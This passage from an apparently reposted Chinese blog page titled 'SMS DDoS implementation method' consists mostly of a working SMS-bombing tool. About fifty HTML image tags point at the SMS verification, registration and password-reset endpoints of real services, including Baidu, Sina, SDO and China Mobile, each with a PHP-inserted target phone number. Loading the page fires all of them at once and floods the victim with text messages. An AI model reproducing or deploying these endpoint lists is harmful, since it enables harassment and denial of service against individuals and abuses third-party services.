<img src='http://account.jzyx.com/common/send-sms.html?tel=<?php echo $tel_no;?>' alt=''/>
<img src='http://t.sdo.com/home/SendSms?mobile=<?php echo $tel_no;?>' alt=''/>
<img src='http://txz.sdo.com/common/msgsend/?m=<?php echo $tel_no;?>&t=2&method=SendAPPDownLoadSMSCallback&fromid=weblogin&r=0.9407026621045355' alt=''/>
<img src='https://mcas.sdo.com/authen/checkAccountType.jsonp?callback=checkAccountType_JSONPMethod&inputUserId=<?php echo $tel_no;?>' alt=''/>
<img src='http://authleqr.sdo.com/lars/check-account-types.jsonp?callback=jQuery16202903677772887056_1353757072377&userId=<?php echo $tel_no;?>&_=1353757193062' alt=''/>
<img src='https://reg.95538.cn/userreg/AjaxHandler.ashx?method=getPhoneCode?mobilePhone=<?php echo $tel_no;?>&type=0' alt=''/>
<img src='http://u.baidu.com/?module=default&controller=Reg&action=sendSMS&b1350745948890=1&mobile=<?php echo $tel_no;?>&appid=3&ucname=huisexinxi' alt=''/>
<img src='http://as.baidu.com/a/msg?act=sendtomobile&f=topic_3001_2_0&mobile=<?php echo $tel_no;?>&docid=1439803&ctime=1353852949890' alt=''/>
<img src='http://as.baidu.com/a/msg?act=sendtomobile&f=web_alad_6%40next%40software_1003_6&mobile=<?php echo $tel_no;?>&docid=1346020&ctime=1350747592671' alt=''/>
<img src='http://api.pengyou.com/json.php?mod=mobilebind&act=sendsms&mobile=<?php echo $tel_no;?>&g_tk=null' alt=''/>
<img src='http://www.maiduo.com/handler/Register/Register.ashx?act=check&mobile=<?php echo $tel_no;?>&checkCode=undefined' alt=''/>
<img src='http://www.sinosig.com/auth/regist_resetMsg.action?sso_userName=<?php echo $tel_no;?>&isAjaxSubmit=true' alt=''/>
<img src='http://www.pubyun.com/accounts/signup_vcode/4449056/?mobile=<?php echo $tel_no;?>' alt=''/>
<img src='http://dealer.autohome.com.cn/Handler/SendMessage.ashx?action=sendcode&mob=<?php echo $tel_no;?>' alt=''/>
<img src='http://yuyue.shdc.org.cn/User/ajaxSendConfirmCode.aspx?mobile=<?php echo $tel_no;?>' alt=''/>
<img src='http://reg.ztgame.com/registe/mobilePhoneRegister?type=isBindPhoneNum&phoneNum=<?php echo $tel_no;?>' alt=''/>
<img src='http://www.baixing.com/ajax/auth/sendCode/?type=resetPassword&mobile=<?php echo $tel_no;?>' alt=''/>
<img src='http://mail.sina.com.cn/cgi-bin/phonecode.php?phonenumber=<?php echo $tel_no;?>' alt=''/>
<img src='http://passport.q.com.cn/register/index/ajaxcheckmobile/?mobile=<?php echo $tel_no;?>' alt=''/>
<img src='http://yun.baidu.com/account/v1/api/sendacodenormal?dest=<?php echo $tel_no;?>' alt=''/>
<img src='https://reg.passport.the9.com/api/chk_loginname?loginname=<?php echo $tel_no;?>&accounttype=reg_mobile' alt=''/>
<img src='https://login.sina.com.cn/signup/check_user.php?format=json&from=mobile&name=<?php echo $tel_no;?>' alt=''/>
<img src='http://js.ac.10086.cn/jsauth/reg?method=sendVerCode&=<?php echo $tel_no;?>' alt=''/>
<img src='http://my.xoyo.com/register/isExist/0.8101254514227967?uid=<?php echo $tel_no;?>&type=mobile' alt=''/>
<img src='http://member.changyou.com/register/checkPhoneIsUsed.do?securityPhone=<?php echo $tel_no;?>' alt=''/>
<img src='https://reg.91.com/AjaxAction/AC_register.ashx?action=verifyusernameofmobile&txtUserNameOfMobile=<?php echo $tel_no;?>' alt=''/>
<img src='http://211.136.93.21/hfwebbusi/pay/saveOrder.do?mobileId=<?php echo $tel_no;?>' alt=''/>
<img src='http://passport.wanmei.com/NoteAction.do?method=sendRegCode?mobile=<?php echo $tel_no;?>' alt=''/>
<img src='http://authleqr.sdo.com/lars/check-account-types.jsonp?callback=jQuery16203658856788579764_1366925187811&userId=<?php echo $tel_no;?>&_=1366925195670' alt=''/>
<img src='http://www.guahao.com/validcode/json/mobile/<?php echo $tel_no;?>/REG_MOBILE/cebaf071614ac29f9ad6c692b474a46f?_=1366925898545' alt=''/>
<img src='http://chinatelecom.zc.qq.com/cgi-bin/send_sms?phonenum=<?php echo $tel_no;?>&stype=1' alt=''/>
<img src='http://cas.sdo.com/authen/sendPhoneCheckCode.jsonp?callback=sendPhoneCheckCode_JSONPMethod&inputUserId=<?php echo $tel_no;?>&type=3&appId=201&areaId=0&serviceUrl=' alt=''/>
<img src='http://sdo.com&productVersion=v5&frameType=3&locale=zh_CN&version=21&tag=20&authenSource=2&productId=2&_=1366924349498' alt=''/>
<img src='http://www.1732.com/public/ajax.aspx?app=resendcode&bindaccount=<?php echo $tel_no;?>' alt=''/>
<img src='http://sign.kting.cn/register/getphoneverify/phone/<?php echo $tel_no;?>' alt=''/>
<img src='http://m.xs8.cn/user/quick_signup.html?mobile=<?php echo $tel_no;?>' alt=''/>
<img src='http://bbs.360che.com/ajax1.php?action=ds21&mobilenum=<?php echo $tel_no;?>&inajax=1&ajaxtarget=ts' alt=''/>
<img src='http://pass.ledu.com/reg/mobilecode?type=reg&mobile=<?php echo $tel_no;?>&r=0.7577109599155907' alt=''/>
<img src='http://www.52callme.com/Handler/SendVerifyCodeHandler.ashx?m=<?php echo $tel_no;?>' alt=''/>
<img src='http://sso.letv.com/user/mobileRegCode/mobile/<?php echo $tel_no;?>/mobilecodeletvid/c326961366927138' alt=''/>
<img src='http://www.sinosig.com/auth/regist_refresh.action?sso_userName=<?php echo $tel_no;?>&resetSend=1' alt=''/>
<img src='https://sn.ac.10086.cn/sendMsgRequest?mobileNumber=<?php echo $tel_no;?>' alt=''/>
<img src='https://fj.ac.10086.cn/SMSCodeSend?mobileNum=<?php echo $tel_no;?>&validCode=0000&errorurl=https://fj.ac.10086.cn/4login/errorPage.jsp&name=menhu' alt=''/>
<img src='https://fj.ac.10086.cn/SMSCodeSend?mobileNum=<?php echo $tel_no;?>&validCode=0000&errorurl=http://www.fj.10086.cn:80/service/login/send.jsp' alt=''/>
<img src='https://fj.ac.10086.cn/ssouser/sendMessage.do?mobileno=<?php echo $tel_no;?>' alt=''/>
<img src='http://www.gs.10086.cn/gs_obsh_service/actionDispatcher.do?userMobile=<?php echo $tel_no;?>' alt=''/>
<img src='https://sn.ac.10086.cn/sendMsgRequest?code=%E7%82%B9%E5%87%BB%E8%8E%B7%E5%8F%96%E9%AA%8C%E8%AF%81%E7%A0%81&mobileNumber=<?php echo $tel_no;?>' alt=''/>
<img src='https://js.ac.10086.cn/jsauth/dzqd/pagSendDypass?umobile=<?php echo $tel_no;?>' alt=''/>
<img src='http://gd.10086.cn/ngcrm/hall/SendRandomSms.action?mobile=<?php echo $tel_no;?>&isReRequest=false' alt=''/>
<img src='http://liao.189.cn/ECP-Portals/phoneDown/download.do?phone=<?php echo $tel_no;?>' alt=''/>
<img src='https://ecplive.cn/reg/servlet/ivrInvokeServlet?number=<?php echo $tel_no;?>&flagNum=3' alt=''/>
<?php
}
?>
</div>
<script src="http://frontend.oss.aliyuncs.com/jquery/1.8.3/jquery.min.js"></script>
<script>
jQuery(document).ready(function(){
jQuery('.btn').click(function(){
if(jQuery('input[name="hm"]').val() == ""){
return false;
}
});
});
</script>
<script type="text/javascript" src="http://tajs.qq.com/stats?sId=26653524" charset="UTF-8"></script>
</body>
</html>
转载请注明:jinglingshu的博客 » 短信ddos实现方法
